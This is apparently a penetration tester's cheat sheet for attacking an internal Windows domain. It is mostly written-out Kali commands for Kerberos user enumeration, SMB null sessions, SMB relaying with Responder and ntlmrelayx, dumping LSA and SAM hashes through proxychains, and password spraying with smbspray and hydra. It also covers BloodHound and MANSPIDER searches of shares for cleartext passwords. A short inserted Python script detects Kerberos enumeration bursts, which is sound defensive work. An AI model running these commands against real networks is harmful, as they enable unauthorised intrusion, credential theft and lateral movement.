Internal (Kali)
Starting with some Nmap scans and scripts, we can find plenty of additional information for more targeted attacks and for finding other attack paths and vectors. Then, depending on whether we were given user credentials for a "compromised user" approach, we can go down other paths; either way, we want to run all of these checks both with and without credentials.
User Enumeration
Without already being given user credentials, we can try to find some using Kerbrute and GetNPUsers.py. These methods can be loud but are still effective.
Kerbrute - A little louder
wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
./kerbrute_linux_amd64 userenum -d DOMAIN --dc DC-IP USERLIST.txt -v -o Outfile.txt
GetNPUsers.py - Can be stealthy but not always.
GetNPUsers.py DOMAIN/ -usersfile USERLIST.txt -dc-ip DC-IP -no-pass
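Added detection-side example, not part of these notes: wordlist-driven enumeration like the above leaves a burst of failed Kerberos TGT requests (Security event 4768, result code 0x6, name does not exist) on the domain controller, and this Python script flags any source that produces such a burst. The sample records and their field names are constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security event 4768 (Kerberos TGT request) records, reduced
# to the fields that matter here; the field names are assumptions for this example.
# Result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) means the requested name does not
# exist, which is what a wordlist-driven enumerator produces for every invalid guess.
SAMPLE_EVENTS = [
    {"ts": "2024-01-10T09:00:00", "ip": "10.0.0.50", "user": "alice", "code": "0x6"},
    {"ts": "2024-01-10T09:00:01", "ip": "10.0.0.50", "user": "bob",   "code": "0x6"},
    {"ts": "2024-01-10T09:00:01", "ip": "10.0.0.50", "user": "carol", "code": "0x0"},
    {"ts": "2024-01-10T09:00:02", "ip": "10.0.0.50", "user": "dave",  "code": "0x6"},
    {"ts": "2024-01-10T09:00:02", "ip": "10.0.0.50", "user": "erin",  "code": "0x6"},
    {"ts": "2024-01-10T09:00:03", "ip": "10.0.0.50", "user": "frank", "code": "0x6"},
    # A user mistyping their own name once and then logging in must not alert.
    {"ts": "2024-01-10T09:05:00", "ip": "10.0.0.77", "user": "carlo", "code": "0x6"},
    {"ts": "2024-01-10T09:05:20", "ip": "10.0.0.77", "user": "carol", "code": "0x0"},
    # Five unknown names spread over an hour are not a burst either.
    {"ts": "2024-01-10T10:00:00", "ip": "10.0.0.90", "user": "u1", "code": "0x6"},
    {"ts": "2024-01-10T10:15:00", "ip": "10.0.0.90", "user": "u2", "code": "0x6"},
    {"ts": "2024-01-10T10:30:00", "ip": "10.0.0.90", "user": "u3", "code": "0x6"},
    {"ts": "2024-01-10T10:45:00", "ip": "10.0.0.90", "user": "u4", "code": "0x6"},
    {"ts": "2024-01-10T11:00:00", "ip": "10.0.0.90", "user": "u5", "code": "0x6"},
]


def detect_userenum(events, window_s=60, min_unknown=5):
    """Return {source_ip: sorted probed names} for each source that produced at
    least `min_unknown` 0x6 failures for distinct names within `window_s` seconds."""
    by_ip = defaultdict(list)
    for e in events:
        if e["code"] == "0x6":
            by_ip[e["ip"]].append((datetime.fromisoformat(e["ts"]), e["user"]))
    window = timedelta(seconds=window_s)
    hits = {}
    for ip, fails in by_ip.items():
        fails.sort()
        start = 0
        for end in range(len(fails)):
            # Slide the window so that fails[start:end + 1] spans at most window_s.
            while fails[end][0] - fails[start][0] > window:
                start += 1
            names = {user for _, user in fails[start:end + 1]}
            if len(names) >= min_unknown:
                hits.setdefault(ip, set()).update(names)
    return {ip: sorted(names) for ip, names in hits.items()}


if __name__ == "__main__":
    for ip, names in detect_userenum(SAMPLE_EVENTS).items():
        print(f"possible user enumeration from {ip}: {len(names)} unknown names, e.g. {names[:3]}")
```

Tune the window and threshold to the DC's normal failure rate; on a busy domain a handful of 0x6 failures per minute from shared infrastructure is routine, while one source probing dozens of distinct names in seconds is not.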
SMB Null Sessions
I like to use SMBCrunch (smbhunt.pl) and NetExec.
git clone https://github.com/Raikia/SMBCrunch.git && cd SMBCrunch
sudo ./smbhunt.pl -i ../445.txt
sudo netexec smb <target-ip> -u "" -p "" --shares
View null sessions with:
sudo smbclient -L //target -U "" -N
SMB Relays
If SMB signing is not required on multiple machines, we can attempt to abuse SMB relays with Responder, ntlmrelayx (from Impacket), and proxychains.
Disable SMB and HTTP in Responder.conf (/etc/responder/Responder.conf):
sudo sed -i 's/SMB = On/SMB = Off/g' /etc/responder/Responder.conf
sudo sed -i 's/HTTP = On/HTTP = Off/g' /etc/responder/Responder.conf
Change the proxychains config (/etc/proxychains4.conf) so it points at the SOCKS port ntlmrelayx opens (1080 by default):
sudo sed -i 's/9050/1080/g' /etc/proxychains4.conf
Use NetExec to generate a list of hosts that do not require SMB signing (--gen-relay-list):
sudo netexec smb up-hosts.txt --gen-relay-list relay.txt
Run Responder
sudo python3 /usr/share/responder/Responder.py -I eth0 -PDv --lm
Run NTLMRelayX in a new window/tab while Responder is running.
sudo python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -tf relay.txt -socks -smb2support -i -of relayed-hashes.txt
Once we have captured relays, we can try to crack the captured hashes, and while they are cracking we can abuse the relayed sessions using NetExec through the SOCKS proxy.
View shares hosted on the target machine:
sudo proxychains4 netexec smb ip -u user -p '' --shares
Dump LSA
sudo proxychains4 netexec smb ip -u user -p '' --lsa
Dump SAM hashes
sudo proxychains4 netexec smb ip -u user -p '' --sam
General Enumeration
Finding the Domain Controller IP. These methods aren't guaranteed, but they work in most cases.
Using nslookup
nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>
Using dig
dig _ldap._tcp.dc._msdcs.<domain> SRV
Checking /etc/resolv.conf
cat /etc/resolv.conf
Web Services
Look at all HTTP/HTTPS pages for login pages, information disclosure, default login credentials, robots.txt, and other directories.
sudo ffuf -recursion -mc all -ac -c -u https://domain/FUZZ -w wordlist.txt
sudo ffuf -recursion -mc all -ac -c -e .htm,.shtml,.php,.html,.js,.txt,.zip,.bak,.asp,.aspx,.xml -w wordlist.txt -u https://domain/FUZZ -fc 400,401,403,404,406,500,502 > domain.txt
FTP
Checking if FTP is open, and if anonymous login is enabled.
sudo nmap -p 21 --script ftp-anon -iL 21.txt
SSH
Checking if SSH is open and whether it accepts password authentication.
sudo nmap -p 22 --script ssh-auth-methods -iL 22.txt
Password Spraying
SMB
git clone https://github.com/absolomb/smbspray.git && cd smbspray
python3 smbspray.py -u users.txt -p passwords.txt -ip DC-IP
SSH
Using hydra:
hydra -L users.txt -P passwords.txt ssh://IP
Post Exploitation
Once we have obtained credentials, we can find even more information. I like to gather it with ldapdomaindump, BloodHound (bloodhound-python), and MANSPIDER.
Bloodhound / Bloodhound-Python
sudo bloodhound-python -u USER -p PASSWORD -ns DNS-SERVER-IP -d DOMAIN -c All
Once we have the .json files, we can ingest them into BloodHound to look for Domain Admins, Kerberoastable accounts, and more.
LDAPDomainDump
sudo ldapdomaindump -u DOMAIN\\USER -p PASSWORD IP
MANSPIDER
Crawl network shares to find helpful information, such as files with cleartext passwords, password databases, and more.
Install
pipx install git+https://github.com/blacklanternsecurity/MANSPIDER
Search a hostname/IP for files with "passw" in the name:
manspider TARGET -f passw -d DOMAIN -u USER -p 'PASSWORD'
Search for documents whose contents contain "passw":
manspider TARGET -c passw -d DOMAIN -u USER -p 'PASSWORD'